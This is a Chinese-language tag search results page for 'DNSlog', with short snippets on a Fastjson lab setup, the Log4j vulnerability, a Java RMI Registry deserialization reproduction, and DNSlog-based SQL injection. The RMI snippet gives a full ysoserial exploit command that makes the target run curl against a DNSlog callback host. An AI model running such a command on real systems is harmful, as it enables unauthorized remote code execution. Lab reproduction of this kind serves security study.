搜索结果
查询Tags标签: DNSlog,共有 5条记录-
Fastjson 1.2.24反序列化漏洞
1.靶场采用Vulhub,一键启动fastjson漏洞环境 2.java jdk采用1.8.0_281 2.1.mkdir /opt/java 2.2.tar zxvf jdk-8u281-linux-x64.tar.gz -C /opt/java2.3.vim /etc/profile 末尾添加: export JAVA_HOME=/opt/java/jdk1.8.0_281 export JRE_HOME=/opt/java/…
2022/3/6 6:15:27 人评论 次浏览 -
Apache Log4j爆“核弹级“漏洞,对众多java应用平台造成影响,已发现近万次攻击
昨晚对很多java程序员来说可能是个不眠之夜,面对突发的Log4j漏洞,很多公司都需要采取应急措施。改漏洞一旦被攻击者利用,将会造成无法估量的危害近日,一个受到全球广泛使用的组件Apache Log4j被曝出现一个可利用的高危漏洞。攻击者只需要一段代码就可以远程控制受害者…
2021/12/10 22:20:50 人评论 次浏览 -
Apache Log4j爆“核弹级“漏洞,对众多java应用平台造成影响,已发现近万次攻击
昨晚对很多java程序员来说可能是个不眠之夜,面对突发的Log4j漏洞,很多公司都需要采取应急措施。改漏洞一旦被攻击者利用,将会造成无法估量的危害近日,一个受到全球广泛使用的组件Apache Log4j被曝出现一个可利用的高危漏洞。攻击者只需要一段代码就可以远程控制受害者…
2021/12/10 22:20:50 人评论 次浏览 -
Java RMI Registry 反序列化漏洞(<=jdk8u111)
漏洞复现 先去这http://www.dnslog.cn/搞个dns 然后用这个命令: java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit your-ip 1099 CommonsCollections6 "curl your-dnslog-server"然后刷新dnslog 好兄弟们你们看懂了吗?反正我…
2021/7/3 12:21:51 人评论 次浏览 -
SQL注入——DNSlog注入,限制有点大
DNSlog注入 原理:首先需要有一个可以配置的域名,比如:ceye.io,然后通过代理商设置域名 ceye.io 的 nameserver 为自己的服务器 A,然后再服务器 A 上配置好 DNS Server,这样以来所有 ceye.io 及其子域名的查询都会到 服务器 A 上,这时就能够实时地监控域名查询请求了…
2021/6/21 2:30:56 人评论 次浏览